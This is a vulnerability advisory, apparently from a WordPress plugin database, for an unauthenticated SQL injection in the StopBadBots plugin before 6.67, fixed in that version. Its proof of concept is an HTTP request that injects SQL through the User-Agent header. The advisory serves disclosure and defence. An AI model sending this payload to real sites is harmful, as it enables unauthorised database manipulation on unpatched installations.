WordPress Plugin Vulnerabilities

StopBadBots < 6.67 - Unauthenticated SQL Injection

Description

The plugin does not sanitise and escape the User Agent before using it in a SQL statement to save it, leading to a SQL injection

Proof of Concept

GET / HTTP/1.1
User-Agent: Zongbot' where id = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'-- -
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Affects Plugins

Fixed in 6.67

References

Classification

Type
SQLI
OWASP top 10
CWE

Miscellaneous

Original Researcher
ZhongFu Su(JrXnm) of Wuhan University
Submitter
ZhongFu Su(JrXnm) of Wuhan University
Submitter website
Verified
Yes

Timeline

Publicly Published
2021-11-15 (about 2 years ago)
Added
2021-11-15 (about 2 years ago)
Last Updated
2022-09-26 (about 1 years ago)

Other